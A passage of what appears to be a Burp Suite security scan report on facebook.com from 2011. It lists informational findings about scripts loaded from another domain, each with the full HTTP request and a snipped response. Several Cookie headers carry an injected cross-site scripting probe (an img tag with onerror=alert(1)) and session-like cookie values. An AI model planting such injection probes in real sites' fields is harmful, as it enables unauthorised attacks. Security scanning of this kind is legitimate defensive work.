Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.11.116
Connection: close
Date: Thu, 05 May 2011 10:56:44 GMT
Content-Length: 6991

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/v1/yv/r/aDyW45UzMGZ.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.87. http://www.facebook.com/plugins/send.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/send.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /plugins/send.php?api_key=117854138246106&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df243eec6a8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffeb4109d%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&href=http%3A%2F%2Faol.sportingnews.com%2Fnfl%2Fstory%2F2011-05-04%2Fathletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter&locale=en_US&ref=story-185322&sdk=joey HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?icid=maing-grid7%7Cmain5%7Cdl4%7Csec1_lnk3%7C60545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.121.75
X-Cnection: close
Date: Thu, 05 May 2011 00:58:07 GMT
Content-Length: 7571

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yn/r/hhXWj5xHnMP.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.88. http://www.facebook.com/plugins/send.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/send.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /plugins/send.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.229.116
Connection: close
Date: Thu, 05 May 2011 10:56:45 GMT
Content-Length: 5954

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yk/r/Ju8IBHuS1Zr.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.89. http://www.facebook.com/policy.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /policy.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /policy.php HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/r.php?profile_id=100000824820783&next=http%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D100000824820783
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; act=1304613620616%2F2; _e_nXwy_1=%5B%22nXwy%22%2C1304613620617%2C%22act%22%2C1304613620616%2C2%2C%22http%3A%2F%2Fwww.facebook.com%2Fpolicy.php%22%2C%22a%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2Fr.php%3Fprofile_id%3D100000824820783%26next%3Dhttp%253A%252F%252Fwww.facebook.com%252Fprofile.php%253Fid%253D100000824820783%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2C657%2C204%2C12%2C981%2C16%5D

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: _e_nXwy_1=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.147.57
X-Cnection: close
Date: Thu, 05 May 2011 11:43:31 GMT
Content-Length: 58371

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yQ/r/9qdm_pQmTM3.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.90. http://www.facebook.com/privacy/explanation.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /privacy/explanation.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /privacy/explanation.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fprivacy%2Fexplanation.php; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.168.53
Connection: close
Date: Thu, 05 May 2011 11:43:04 GMT
Content-Length: 27769

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y1/r/Sxn9HcQx7-s.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.91. http://www.facebook.com/r.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /r.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /r.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.252.126
Connection: close
Date: Thu, 05 May 2011 10:56:46 GMT
Content-Length: 29390

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/6x5Oqo2nmb-.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.92. http://www.facebook.com/r.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /r.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /r.php?profile_id=100000824820783&next=http%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D100000824820783 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/people/Bucky-Jordan/100000824820783
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=1022x1007

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.152.27
X-Cnection: close
Date: Thu, 05 May 2011 11:43:18 GMT
Content-Length: 29953

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yQ/r/9qdm_pQmTM3.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.93. http://www.facebook.com/robynalys

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /robynalys

Issue detail

The response dynamically includes the following script from another domain:
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /robynalys HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Frobynalys; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.154.29
Connection: close
Date: Thu, 05 May 2011 11:42:29 GMT
Content-Length: 47590

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/5skHSErf84s.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.94. http://www.facebook.com/share.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /share.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /share.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fshare.php; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.25.111
Connection: close
Date: Thu, 05 May 2011 10:56:46 GMT
Content-Length: 10415

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/6x5Oqo2nmb-.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.95. http://www.facebook.com/sharer.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /sharer.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /sharer.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fsharer.php; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.32.111
Connection: close
Date: Thu, 05 May 2011 10:56:48 GMT
Content-Length: 10419

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/6x5Oqo2nmb-.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.96. http://www.facebook.com/skdarealist

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /skdarealist

Issue detail

The response dynamically includes the following script from another domain:
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /skdarealist HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fskdarealist; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.165.81
Connection: close
Date: Thu, 05 May 2011 11:42:27 GMT
Content-Length: 115848

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/5skHSErf84s.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.97. http://www.facebook.com/sportingnews

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /sportingnews

Issue detail

The response dynamically includes the following script from another domain:
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /sportingnews HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.141.21
Connection: close
Date: Thu, 05 May 2011 11:41:49 GMT
Content-Length: 197753

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/6x5Oqo2nmb-.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.98. http://www.facebook.com/stefanoboscolomarchi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /stefanoboscolomarchi

Issue detail

The response dynamically includes the following script from another domain:
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /stefanoboscolomarchi HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fstefanoboscolomarchi; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.199.47
Connection: close
Date: Thu, 05 May 2011 11:42:33 GMT
Content-Length: 145632

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
